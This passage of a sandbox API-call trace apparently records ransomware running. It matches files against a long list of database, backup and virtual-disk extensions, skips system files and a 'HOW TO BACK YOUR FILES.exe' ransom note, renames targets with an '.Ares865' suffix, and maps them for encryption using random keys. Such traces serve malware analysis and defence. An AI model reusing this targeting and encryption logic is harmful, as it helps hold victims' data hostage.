(lpString="sqlitedb") returned 8 [0058.905] lstrcmpiW (lpString1="ToTarget", lpString2="sqlitedb") returned 1 [0058.905] lstrlenW (lpString="xml") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="xml") returned -1 [0058.905] lstrlenW (lpString="$er") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="$er") returned 1 [0058.905] lstrlenW (lpString="4dd") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="4dd") returned 1 [0058.905] lstrlenW (lpString="4dl") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="4dl") returned 1 [0058.905] lstrlenW (lpString="^^^") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="^^^") returned 1 [0058.905] lstrlenW (lpString="abs") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="abs") returned 1 [0058.905] lstrlenW (lpString="abx") returned 3 [0058.905] lstrcmpiW (lpString1="get", lpString2="abx") returned 1 [0058.905] lstrlenW (lpString="accdb") returned 5 [0058.905] lstrcmpiW (lpString1="arget", lpString2="accdb") returned 1 [0058.905] lstrlenW (lpString="accdc") returned 5 [0058.905] lstrcmpiW (lpString1="arget", lpString2="accdc") returned 1 [0058.905] lstrlenW (lpString="accde") returned 5 [0058.905] lstrcmpiW (lpString1="arget", lpString2="accde") returned 1 [0058.905] lstrlenW (lpString="accdr") returned 5 [0058.906] lstrcmpiW (lpString1="arget", lpString2="accdr") returned 1 [0058.906] lstrlenW (lpString="accdt") returned 5 [0058.906] lstrcmpiW (lpString1="arget", lpString2="accdt") returned 1 [0058.906] lstrlenW (lpString="accdw") returned 5 [0058.906] lstrcmpiW (lpString1="arget", lpString2="accdw") returned 1 [0058.906] lstrlenW (lpString="accft") returned 5 [0058.906] lstrcmpiW (lpString1="arget", lpString2="accft") returned 1 [0058.906] lstrlenW (lpString="adb") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="adb") returned 1 [0058.906] lstrlenW (lpString="adb") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="adb") returned 1 [0058.906] lstrlenW (lpString="ade") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="ade") returned 1 [0058.906] lstrlenW (lpString="adf") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="adf") returned 1 [0058.906] lstrlenW (lpString="adn") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="adn") returned 1 [0058.906] lstrlenW (lpString="adp") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="adp") returned 1 [0058.906] lstrlenW (lpString="alf") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="alf") returned 1 [0058.906] lstrlenW (lpString="ask") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="ask") returned 1 [0058.906] lstrlenW (lpString="btr") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="btr") returned 1 [0058.906] lstrlenW (lpString="cat") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="cat") returned 1 [0058.906] lstrlenW (lpString="cdb") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="cdb") returned 1 [0058.906] lstrlenW (lpString="ckp") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="ckp") returned 1 [0058.906] lstrlenW (lpString="cma") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="cma") returned 1 [0058.906] lstrlenW (lpString="cpd") returned 3 [0058.906] lstrcmpiW (lpString1="get", lpString2="cpd") returned 1 [0058.906] lstrlenW (lpString="dacpac") returned 6 [0058.907] lstrcmpiW (lpString1="Target", lpString2="dacpac") returned 1 [0058.907] lstrlenW (lpString="dad") returned 3 [0058.907] lstrcmpiW (lpString1="get", lpString2="dad") returned 1 [0058.907] lstrlenW (lpString="dadiagrams") returned 10 [0058.907] lstrcmpiW (lpString1="ndToTarget", lpString2="dadiagrams") returned 1 [0058.907] lstrlenW (lpString="daschema") returned 8 [0058.907] lstrcmpiW (lpString1="ToTarget", lpString2="daschema") returned 1 [0058.907] lstrlenW (lpString="db-journal") returned 10 [0058.907] lstrcmpiW (lpString1="ndToTarget", lpString2="db-journal") returned 1 [0058.907] lstrlenW (lpString="db-shm") returned 6 [0058.907] lstrcmpiW (lpString1="Target", lpString2="db-shm") returned 1 [0058.907] lstrlenW (lpString="db-wal") returned 6 [0058.907] lstrcmpiW (lpString1="Target", lpString2="db-wal") returned 1 [0058.907] lstrlenW (lpString="dbc") returned 3 [0058.907] lstrcmpiW (lpString1="get", lpString2="dbc") returned 1 [0058.907] lstrlenW (lpString="dbs") returned 3 [0058.907] lstrcmpiW (lpString1="get", lpString2="dbs") returned 1 [0058.907] lstrlenW (lpString="dbt") returned 3 [0058.907] lstrcmpiW (lpString1="get", lpString2="dbt") returned 1 [0058.907] lstrlenW (lpString="dbv") returned 3 [0058.907] lstrcmpiW (lpString1="get", lpString2="dbv") returned 1 [0058.907] lstrlenW (lpString="dbx") returned 3 [0058.907] lstrcmpiW (lpString1="get", lpString2="dbx") returned 1 [0058.907] lstrlenW (lpString="dcb") returned 3 [0058.907] lstrcmpiW (lpString1="get", lpString2="dcb") returned 1 [0058.907] lstrlenW (lpString="dct") returned 3 [0058.907] lstrcmpiW (lpString1="get", lpString2="dct") returned 1 [0058.907] lstrlenW (lpString="dcx") returned 3 [0058.907] lstrcmpiW (lpString1="get", lpString2="dcx") returned 1 [0058.907] lstrlenW (lpString="ddl") returned 3 [0058.907] lstrcmpiW (lpString1="get", lpString2="ddl") returned 1 [0058.907] lstrlenW (lpString="dlis") returned 4 [0058.907] lstrcmpiW (lpString1="rget", lpString2="dlis") returned 1 [0058.907] lstrlenW (lpString="dp1") returned 3 [0058.907] lstrcmpiW (lpString1="get", lpString2="dp1") returned 1 [0058.907] lstrlenW (lpString="dqy") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="dqy") returned 1 [0058.908] lstrlenW (lpString="dsk") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="dsk") returned 1 [0058.908] lstrlenW (lpString="dsn") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="dsn") returned 1 [0058.908] lstrlenW (lpString="dtsx") returned 4 [0058.908] lstrcmpiW (lpString1="rget", lpString2="dtsx") returned 1 [0058.908] lstrlenW (lpString="dxl") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="dxl") returned 1 [0058.908] lstrlenW (lpString="eco") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="eco") returned 1 [0058.908] lstrlenW (lpString="ecx") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="ecx") returned 1 [0058.908] lstrlenW (lpString="edb") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="edb") returned 1 [0058.908] lstrlenW (lpString="epim") returned 4 [0058.908] lstrcmpiW (lpString1="rget", lpString2="epim") returned 1 [0058.908] lstrlenW (lpString="fcd") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="fcd") returned 1 [0058.908] lstrlenW (lpString="fdb") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="fdb") returned 1 [0058.908] lstrlenW (lpString="fic") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="fic") returned 1 [0058.908] lstrlenW (lpString="flexolibrary") returned 12 [0058.908] lstrcmpiW (lpString1="SendToTarget", lpString2="flexolibrary") returned 1 [0058.908] lstrlenW (lpString="fm5") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="fm5") returned 1 [0058.908] lstrlenW (lpString="fmp") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="fmp") returned 1 [0058.908] lstrlenW (lpString="fmp12") returned 5 [0058.908] lstrcmpiW (lpString1="arget", lpString2="fmp12") returned -1 [0058.908] lstrlenW (lpString="fmpsl") returned 5 [0058.908] lstrcmpiW (lpString1="arget", lpString2="fmpsl") returned -1 [0058.908] lstrlenW (lpString="fol") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="fol") returned 1 [0058.908] lstrlenW (lpString="fp3") returned 3 [0058.908] lstrcmpiW (lpString1="get", lpString2="fp3") returned 1 [0058.908] lstrlenW (lpString="fp4") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="fp4") returned 1 [0058.909] lstrlenW (lpString="fp5") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="fp5") returned 1 [0058.909] lstrlenW (lpString="fp7") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="fp7") returned 1 [0058.909] lstrlenW (lpString="fpt") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="fpt") returned 1 [0058.909] lstrlenW (lpString="frm") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="frm") returned 1 [0058.909] lstrlenW (lpString="gdb") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="gdb") returned 1 [0058.909] lstrlenW (lpString="gdb") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="gdb") returned 1 [0058.909] lstrlenW (lpString="grdb") returned 4 [0058.909] lstrcmpiW (lpString1="rget", lpString2="grdb") returned 1 [0058.909] lstrlenW (lpString="gwi") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="gwi") returned -1 [0058.909] lstrlenW (lpString="hdb") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="hdb") returned -1 [0058.909] lstrlenW (lpString="his") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="his") returned -1 [0058.909] lstrlenW (lpString="ib") returned 2 [0058.909] lstrcmpiW (lpString1="et", lpString2="ib") returned -1 [0058.909] lstrlenW (lpString="idb") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="idb") returned -1 [0058.909] lstrlenW (lpString="ihx") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="ihx") returned -1 [0058.909] lstrlenW (lpString="itdb") returned 4 [0058.909] lstrcmpiW (lpString1="rget", lpString2="itdb") returned 1 [0058.909] lstrlenW (lpString="itw") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="itw") returned -1 [0058.909] lstrlenW (lpString="jet") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="jet") returned -1 [0058.909] lstrlenW (lpString="jtx") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="jtx") returned -1 [0058.909] lstrlenW (lpString="kdb") returned 3 [0058.909] lstrcmpiW (lpString1="get", lpString2="kdb") returned -1 [0058.910] lstrlenW (lpString="kexi") returned 4 [0058.910] lstrcmpiW (lpString1="rget", lpString2="kexi") returned 1 [0058.910] lstrlenW (lpString="kexic") returned 5 [0058.910] lstrcmpiW (lpString1="arget", lpString2="kexic") returned -1 [0058.910] lstrlenW (lpString="kexis") returned 5 [0058.910] lstrcmpiW (lpString1="arget", lpString2="kexis") returned -1 [0058.910] lstrlenW (lpString="lgc") returned 3 [0058.910] lstrcmpiW (lpString1="get", lpString2="lgc") returned -1 [0058.910] lstrlenW (lpString="lwx") returned 3 [0058.910] lstrcmpiW (lpString1="get", lpString2="lwx") returned -1 [0058.910] lstrlenW (lpString="maf") returned 3 [0058.910] lstrcmpiW (lpString1="get", lpString2="maf") returned -1 [0058.910] lstrlenW (lpString="maq") returned 3 [0058.910] lstrcmpiW (lpString1="get", lpString2="maq") returned -1 [0058.910] lstrlenW (lpString="mar") returned 3 [0058.910] lstrcmpiW (lpString1="get", lpString2="mar") returned -1 [0058.910] lstrlenW (lpString="marshal") returned 7 [0058.910] lstrcmpiW (lpString1="oTarget", lpString2="marshal") returned 1 [0058.910] lstrlenW (lpString="mas") returned 3 [0058.910] lstrcmpiW (lpString1="get", lpString2="mas") returned -1 [0058.910] lstrlenW (lpString="mav") returned 3 [0058.910] lstrcmpiW (lpString1="get", lpString2="mav") returned -1 [0058.910] lstrlenW (lpString="maw") returned 3 [0058.910] lstrcmpiW (lpString1="get", lpString2="maw") returned -1 [0058.910] lstrlenW (lpString="mdbhtml") returned 7 [0058.910] lstrcmpiW (lpString1="oTarget", lpString2="mdbhtml") returned 1 [0058.910] lstrlenW (lpString="mdn") returned 3 [0058.910] lstrcmpiW (lpString1="get", lpString2="mdn") returned -1 [0058.910] lstrlenW (lpString="mdt") returned 3 [0058.910] lstrcmpiW (lpString1="get", lpString2="mdt") returned -1 [0058.910] lstrlenW (lpString="mfd") returned 3 [0058.910] lstrcmpiW (lpString1="get", lpString2="mfd") returned -1 [0058.910] lstrlenW (lpString="mpd") returned 3 [0058.910] lstrcmpiW (lpString1="get", lpString2="mpd") returned -1 [0058.910] lstrlenW (lpString="mrg") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="mrg") returned -1 [0058.911] lstrlenW (lpString="mud") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="mud") returned -1 [0058.911] lstrlenW (lpString="mwb") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="mwb") returned -1 [0058.911] lstrlenW (lpString="myd") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="myd") returned -1 [0058.911] lstrlenW (lpString="ndf") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="ndf") returned -1 [0058.911] lstrlenW (lpString="nnt") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="nnt") returned -1 [0058.911] lstrlenW (lpString="nrmlib") returned 6 [0058.911] lstrcmpiW (lpString1="Target", lpString2="nrmlib") returned 1 [0058.911] lstrlenW (lpString="ns2") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="ns2") returned -1 [0058.911] lstrlenW (lpString="ns3") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="ns3") returned -1 [0058.911] lstrlenW (lpString="ns4") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="ns4") returned -1 [0058.911] lstrlenW (lpString="nsf") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="nsf") returned -1 [0058.911] lstrlenW (lpString="nv") returned 2 [0058.911] lstrcmpiW (lpString1="et", lpString2="nv") returned -1 [0058.911] lstrlenW (lpString="nv2") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="nv2") returned -1 [0058.911] lstrlenW (lpString="nwdb") returned 4 [0058.911] lstrcmpiW (lpString1="rget", lpString2="nwdb") returned 1 [0058.911] lstrlenW (lpString="nyf") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="nyf") returned -1 [0058.911] lstrlenW (lpString="odb") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="odb") returned -1 [0058.911] lstrlenW (lpString="odb") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="odb") returned -1 [0058.911] lstrlenW (lpString="oqy") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="oqy") returned -1 [0058.911] lstrlenW (lpString="ora") returned 3 [0058.911] lstrcmpiW (lpString1="get", lpString2="ora") returned -1 [0058.912] lstrlenW (lpString="orx") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="orx") returned -1 [0058.912] lstrlenW (lpString="owc") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="owc") returned -1 [0058.912] lstrlenW (lpString="p96") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="p96") returned -1 [0058.912] lstrlenW (lpString="p97") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="p97") returned -1 [0058.912] lstrlenW (lpString="pan") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="pan") returned -1 [0058.912] lstrlenW (lpString="pdb") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="pdb") returned -1 [0058.912] lstrlenW (lpString="pdm") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="pdm") returned -1 [0058.912] lstrlenW (lpString="pnz") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="pnz") returned -1 [0058.912] lstrlenW (lpString="qry") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="qry") returned -1 [0058.912] lstrlenW (lpString="qvd") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="qvd") returned -1 [0058.912] lstrlenW (lpString="rbf") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="rbf") returned -1 [0058.912] lstrlenW (lpString="rctd") returned 4 [0058.912] lstrcmpiW (lpString1="rget", lpString2="rctd") returned 1 [0058.912] lstrlenW (lpString="rod") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="rod") returned -1 [0058.912] lstrlenW (lpString="rodx") returned 4 [0058.912] lstrcmpiW (lpString1="rget", lpString2="rodx") returned -1 [0058.912] lstrlenW (lpString="rpd") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="rpd") returned -1 [0058.912] lstrlenW (lpString="rsd") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="rsd") returned -1 [0058.912] lstrlenW (lpString="sas7bdat") returned 8 [0058.912] lstrcmpiW (lpString1="ToTarget", lpString2="sas7bdat") returned 1 [0058.912] lstrlenW (lpString="sbf") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="sbf") returned -1 [0058.912] lstrlenW (lpString="scx") returned 3 [0058.912] lstrcmpiW (lpString1="get", lpString2="scx") returned -1 [0058.912] lstrlenW (lpString="sdb") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="sdb") returned -1 [0058.913] lstrlenW (lpString="sdc") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="sdc") returned -1 [0058.913] lstrlenW (lpString="sdf") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="sdf") returned -1 [0058.913] lstrlenW (lpString="sis") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="sis") returned -1 [0058.913] lstrlenW (lpString="spq") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="spq") returned -1 [0058.913] lstrlenW (lpString="te") returned 2 [0058.913] lstrcmpiW (lpString1="et", lpString2="te") returned -1 [0058.913] lstrlenW (lpString="teacher") returned 7 [0058.913] lstrcmpiW (lpString1="oTarget", lpString2="teacher") returned -1 [0058.913] lstrlenW (lpString="tmd") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="tmd") returned -1 [0058.913] lstrlenW (lpString="tps") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="tps") returned -1 [0058.913] lstrlenW (lpString="trc") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="trc") returned -1 [0058.913] lstrlenW (lpString="trc") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="trc") returned -1 [0058.913] lstrlenW (lpString="trm") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="trm") returned -1 [0058.913] lstrlenW (lpString="udb") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="udb") returned -1 [0058.913] lstrlenW (lpString="udl") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="udl") returned -1 [0058.913] lstrlenW (lpString="usr") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="usr") returned -1 [0058.913] lstrlenW (lpString="v12") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="v12") returned -1 [0058.913] lstrlenW (lpString="vis") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="vis") returned -1 [0058.913] lstrlenW (lpString="vpd") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="vpd") returned -1 [0058.913] lstrlenW (lpString="vvv") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="vvv") returned -1 [0058.913] lstrlenW (lpString="wdb") returned 3 [0058.913] lstrcmpiW (lpString1="get", lpString2="wdb") returned -1 [0058.914] lstrlenW (lpString="wmdb") returned 4 [0058.914] lstrcmpiW (lpString1="rget", lpString2="wmdb") returned -1 [0058.914] lstrlenW (lpString="wrk") returned 3 [0058.914] lstrcmpiW (lpString1="get", lpString2="wrk") returned -1 [0058.914] lstrlenW (lpString="xdb") returned 3 [0058.914] lstrcmpiW (lpString1="get", lpString2="xdb") returned -1 [0058.914] lstrlenW (lpString="xld") returned 3 [0058.914] lstrcmpiW (lpString1="get", lpString2="xld") returned -1 [0058.914] lstrlenW (lpString="xmlff") returned 5 [0058.914] lstrcmpiW (lpString1="arget", lpString2="xmlff") returned -1 [0058.914] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.Ares865") returned 78 [0058.914] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\default user\\sendto\\compressed (zipped) folder.zfsendtotarget"), lpNewFileName="C:\\Users\\Default User\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.Ares865" (normalized: "c:\\users\\default user\\sendto\\compressed (zipped) folder.zfsendtotarget.ares865"), dwFlags=0x1) returned 1 [0058.920] CreateFileW (lpFileName="C:\\Users\\Default User\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.Ares865" (normalized: "c:\\users\\default user\\sendto\\compressed (zipped) folder.zfsendtotarget.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0058.920] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3) returned 1 [0058.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.920] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.921] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.921] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.921] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x118 [0058.930] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x190000 [0058.936] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.937] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.937] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.937] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.937] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.937] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.937] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.937] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.937] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.937] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cbdb0 [0058.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0058.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.938] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.938] CloseHandle (hObject=0x118) returned 1 [0058.938] CloseHandle (hObject=0x164) returned 1 [0058.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.939] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c45a701, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3bb52ab9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop (create shortcut).DeskLink", cAlternateFileName="DESKTO~1.DES")) returned 1 [0058.939] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.939] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="aoldtz.exe") returned 1 [0058.939] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".") returned 1 [0058.939] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="..") returned 1 [0058.939] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="windows") returned -1 [0058.940] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="bootmgr") returned 1 [0058.940] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="temp") returned -1 [0058.940] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="pagefile.sys") returned -1 [0058.940] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="boot") returned 1 [0058.940] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="ids.txt") returned -1 [0058.940] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="ntuser.dat") returned -1 [0058.940] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="perflogs") returned -1 [0058.940] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="MSBuild") returned -1 [0058.940] lstrlenW (lpString="Desktop (create shortcut).DeskLink") returned 34 [0058.940] lstrlenW (lpString="C:\\Users\\Default User\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget") returned 70 [0058.940] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Desktop (create shortcut).DeskLink" | out: lpString1="Desktop (create shortcut).DeskLink") returned="Desktop (create shortcut).DeskLink" [0058.940] lstrlenW (lpString="Desktop (create shortcut).DeskLink") returned 34 [0058.940] lstrlenW (lpString="Ares865") returned 7 [0058.940] lstrcmpiW (lpString1="eskLink", lpString2="Ares865") returned 1 [0058.940] lstrlenW (lpString=".dll") returned 4 [0058.940] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".dll") returned 1 [0058.940] lstrlenW (lpString=".lnk") returned 4 [0058.940] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".lnk") returned 1 [0058.940] lstrlenW (lpString=".ini") returned 4 [0058.940] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".ini") returned 1 [0058.940] lstrlenW (lpString=".sys") returned 4 [0058.940] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".sys") returned 1 [0058.940] lstrlenW (lpString="Desktop (create shortcut).DeskLink") returned 34 [0058.940] lstrlenW (lpString="bak") returned 3 [0058.940] lstrcmpiW (lpString1="ink", lpString2="bak") returned 1 [0058.940] lstrlenW (lpString="ba_") returned 3 [0058.940] lstrcmpiW (lpString1="ink", lpString2="ba_") returned 1 [0058.940] lstrlenW (lpString="dbb") returned 3 [0058.940] lstrcmpiW (lpString1="ink", lpString2="dbb") returned 1 [0058.940] lstrlenW (lpString="vmdk") returned 4 [0058.940] lstrcmpiW (lpString1="Link", lpString2="vmdk") returned -1 [0058.940] lstrlenW (lpString="rar") returned 3 [0058.940] lstrcmpiW (lpString1="ink", lpString2="rar") returned -1 [0058.940] lstrlenW (lpString="zip") returned 3 [0058.940] lstrcmpiW (lpString1="ink", lpString2="zip") returned -1 [0058.940] lstrlenW (lpString="tgz") returned 3 [0058.940] lstrcmpiW (lpString1="ink", lpString2="tgz") returned -1 [0058.941] lstrlenW (lpString="vbox") returned 4 [0058.941] lstrcmpiW (lpString1="Link", lpString2="vbox") returned -1 [0058.941] lstrlenW (lpString="vdi") returned 3 [0058.941] lstrcmpiW (lpString1="ink", lpString2="vdi") returned -1 [0058.941] lstrlenW (lpString="vhd") returned 3 [0058.941] lstrcmpiW (lpString1="ink", lpString2="vhd") returned -1 [0058.941] lstrlenW (lpString="vhdx") returned 4 [0058.941] lstrcmpiW (lpString1="Link", lpString2="vhdx") returned -1 [0058.941] lstrlenW (lpString="avhd") returned 4 [0058.941] lstrcmpiW (lpString1="Link", lpString2="avhd") returned 1 [0058.941] lstrlenW (lpString="db") returned 2 [0058.941] 